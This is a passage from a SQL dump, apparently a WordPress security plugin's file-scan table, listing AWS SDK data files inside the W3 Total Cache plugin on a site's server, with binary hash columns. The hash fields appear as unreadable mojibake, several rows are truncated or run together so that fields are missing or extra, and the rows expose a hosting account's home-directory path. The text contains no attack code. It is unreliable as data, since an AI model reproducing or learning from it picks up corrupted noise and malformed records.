','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb-session/2019-07-11/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/qldb-session/2019-07-11/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȝp{ڧPK','\rFvt*G<~`\r}','',0,'?'),('\0\ZA\"₅e','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/quicksight/2018-04-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/quicksight/2018-04-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gmjid\n6Nsv#','r˛lD\0&m2^Ue>5BcQB]','',0,'?'),('[`!pp)A','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/quicksight/2018-04-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/quicksight/2018-04-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}QB6v',']dgyn1-WDžͣwyK# %','',0,'?'),('۞j\"','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ram/2018-01-04/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ram/2018-01-04/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#7IW',';tD+Ab9T#ïr&Vf{Ə','',0,'?'),('4o_su:%','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ram/2018-01-04/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ram/2018-01-04/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_pcv','cVaR *^MY\0턪alA;\n%','',0,'?'),('Veէ\"Q+ %','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qAve ','=ʻ\r0n{8\'GJ\ry!QG','',0,'?'),('r[+Fu׈5J=y','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h Y<0,`o','\\ZFij-4xqX ȣ','',0,'?'),('>;7\n-<','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-09-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y8 ŵvRhIx','d $#ö,,cJa','',0,'?'),('tG-}g2Fj{`','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1N*!=i,','֌\ns|Vp£8B]m5cI','',0,'?'),('< ~]}:/?N\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#h+j\'Gww\Z','r]-4ϤzOsX~\rxBT;==','',0,'?'),('o1sB=','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds/2014-10-31/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.ZD\\*67jl1','KYÄdFG H\0,','>\'`^k&\n@Gbފ#YJ%?m','',0,'?'),('g ֭P\n!Kf* ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds-data/2018-08-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/rds-data/2018-08-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SmkqlJ_','m4/CWh.qX5GcR* Lq^^A','',0,'?'),('Ҧh@C!','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SC,9c:AB','v-z? \n7?kYyۼS','',0,'?'),('chv}p!VV?','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>||}z0','uR]AAs}4uxrF','',0,'?'),('#:zM7Y\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6\'GjH2WC\'`&','yHFz!h6A(\Z4>Q#\Z2','',0,'?'),('􉡪rpv4#M','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/waiters-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/redshift/2012-12-01/waiters-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fMS1} ','&/nlofQLz|H','',0,'?'),('4

}4gwxJ','',0,'?'),('#MZͺ~n','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!pAYLm$oC','KC]w*>9).-Ll{u','',0,'?'),('4f+mw&`','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oIZM@h','hx׻b/s♞[8qlN','',0,'?'),('\"錌WYT7','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/route53/2013-04-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8x(C2o',')qma֐I\\2wN٪ɶ;FA','',0,'?'),('xœ`','ذ,U79]\ZqaUt(66٭','',0,'?'),('Ԁ̙`rKQ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex.v2/2020-08-07/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex.v2/2020-08-07/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʈO\0?oI','+5\rB 49tj$ ʡ\Zi,If','',0,'?'),('\Z Q9Q\rUc','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex.v2/2020-08-07/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.lex.v2/2020-08-07/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+Hyʎ5s','Y䖖r.\\5y~n?9JRG','',0,'?'),('7 }[\Z,KY:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.sagemaker/2017-05-13/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.sagemaker/2017-05-13/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z_e)rTl','t 5_HO$ V\ng ]','',0,'?'),('eVdie]','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.sagemaker/2017-05-13/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/runtime.sagemaker/2017-05-13/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֑1:/\n#','/6\\1h%\Z6ig\'/_','',0,'?'),('\06jt&gxmq','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ҴT[l','vڌFOW6iԗ','',0,'?'),('b}/ C','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d!z!λ`','2QŰe/@QL)','',0,'?'),('md0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3/2006-03-01/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K]]?2\Z1ߊ','>G }fڵ%` IZLDf','',0,'?'),('VzkW>J','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3control/2018-08-20/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3control/2018-08-20/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','å\rj\\h3y+','&\'g,`IzsXD(qu|','',0,'?'),('Ff>}%L)R.\"8C','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3control/2018-08-20/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3control/2018-08-20/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6܂NՐ=S','Pq\0;L|HJ\ZEb_gЮQ','',0,'?'),('R 1~@\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3outposts/2017-07-25/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3outposts/2017-07-25/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mĆFh\rE','he+:UX_g b]*Y','',0,'?'),('pͲm>[n@Bc ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3outposts/2017-07-25/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/s3outposts/2017-07-25/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+X~s7Hʶ','~XÇI#7)Sg٩F9ŀ%\"','',0,'?'),('kiA=8y(','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H:A`k(','sBmfFDOMB','',0,'?'),('-j(\n#XRУH','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+<<\"CF','|gPBb.a1]젼U#+\npS','',0,'?'),('{-?gg n7iX.','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker/2017-07-24/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tB/vM\\5','mm(SW6B^\ZRlqS','',0,'?'),('iii&. Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-a2i-runtime/2019-11-07/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-a2i-runtime/2019-11-07/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t6\Zٜ','V ϙŽTQp','',0,'?'),('ջ3Z ևq(Ҏ0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-a2i-runtime/2019-11-07/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sagemaker-a2i-runtime/2019-11-07/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[[#q\Z;','c7Kpc ','',0,'?'),('[6 W1e]zJߋJe','',0,'?'),('`0 7Bs','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/schemas/2019-12-02/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/schemas/2019-12-02/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Jy^an ','LJ\\<w|#oOr\\Þ ;','',0,'?'),(')v 5\'6A','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/schemas/2019-12-02/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/schemas/2019-12-02/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2|pJxwO','=o+&Yc6 ͂yrp^κ','',0,'?'),('[_{rvcPj','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\'BVBǤ','yewmlgƔ;hGm_vsX','',0,'?'),(']Kb 9\rk\Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6s{@K}N','Q%[g7Q O}bL@;K1],j','',0,'?'),('o88ߤU$','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/secretsmanager/2017-10-17/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hqniT8','Al䎍xy@n4;n>\nSX','',0,'?'),('(UxJɤ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/securityhub/2018-10-26/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/securityhub/2018-10-26/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\rK\\9q}޼','_Ct)M = ܻlٚHu9d','',0,'?'),('R0+Q zuz','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/securityhub/2018-10-26/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/securityhub/2018-10-26/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DTISu֎Y','g8a!G`\"A~9;;zsC]E','',0,'?'),('73M ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/serverlessrepo/2017-09-08/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/serverlessrepo/2017-09-08/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\0^ţgNZf','@8ǽd \'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/service-quotas/2019-06-24/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/service-quotas/2019-06-24/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܥEl,j=ERw:','Ն 9.Z¡u{X7~Uܜ','',0,'?'),('X+a8:Y%i','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/service-quotas/2019-06-24/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/service-quotas/2019-06-24/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','53^X$M','J(2xVC\"ó\r\rQ B7','',0,'?'),('/iRyါ,3!','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DoA.>(@c','8Ο>yxw kNgnL','',0,'?'),('Kac/؎Q3f','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r@i4A{nS',' pkm8\nb\"[?Ogz/','',0,'?'),('HeIۂBj+0','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog/2015-12-10/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@jnimt$Eњ_','\Zgz])%y67UyOR','',0,'?'),('p h6(OM','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog-appregistry/2020-06-24/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog-appregistry/2020-06-24/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?Wja@zai','p Ǚ2e쪬9 Vr/Wy%','',0,'?'),('=L^欄j`R','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog-appregistry/2020-06-24/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicecatalog-appregistry/2020-06-24/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gej6#','YLVt_\Z6\\~yK\nnh','',0,'?'),('lQG:?aTz','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicediscovery/2017-03-14/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/servicediscovery/2017-03-14/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_\\th','?\ZQCt_j&nQ):&','',0,'?'),('_ր6ӫc\\','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\nnA\nqG*','n=h^/7L|t&\'oU)nPE','',0,'?'),('J]1#?uͩr','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' `/Ti','\";Bkm!:u /Dg̟','',0,'?'),('?bQImKv','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms/2016-10-24/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kwo5ǎF\nʺ','.>D06J݊\r[Z@zas_)C','',0,'?'),('*3\ZUtbtU','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms-voice/2018-09-05/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sms-voice/2018-09-05/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QGae&','Ke&Vg 4Rf]SuFtk{~','',0,'?'),('CgRB .','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3tGd~=','(># MG,]f','',0,'?'),(']ii6*ci','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+B\0U|VZ|M','նe|Q/;2fV f','',0,'?'),('aQNfz\0%R','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/snowball/2016-06-30/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','TCr0Ff[','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^>G4','\\0&]byrWsn) D}','',0,'?'),('(}I%)R','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zv-{?`?','~D^/<զ&L0=!+','',0,'?'),('P$bt ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sns/2010-03-31/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[/^:|p','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZNO4p&6Hev','`(cNns¥{f_xk','',0,'?'),('F{=z) e','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lmiKkLf!','RM1Fe/4ޤamn','',0,'?'),('+0V␯:','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05/smoke.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05/smoke.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b>','S2GbfOjԡ%M`fl','',0,'?'),('en[twIV','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05/waiters-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sqs/2012-11-05/waiters-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tddH{7E?','Qז|lt\\lc奧\n߷\nSph','',0,'?'),('!Ȃ h(','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ssm/2014-11-06/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ssm/2014-11-06/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2 5FL\r','лÙ\"aa','',0,'?'),('ͨOEr.^O','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ssm-contacts/2021-05-03/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ssm-contacts/2021-05-03/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}vΊ(P8\r','',0,'?'),('i@{ D_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sso-admin/2020-07-20/api-2.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sso-admin/2020-07-20/api-2.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|rejWP4G','_g&XDLJX$ҧY\" ;ݜX','',0,'?'),('JKg\'VSo','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sso-admin/2020-07-20/paginators-1.json.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/sso-admin/2020-07-20/paginators-1.json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R 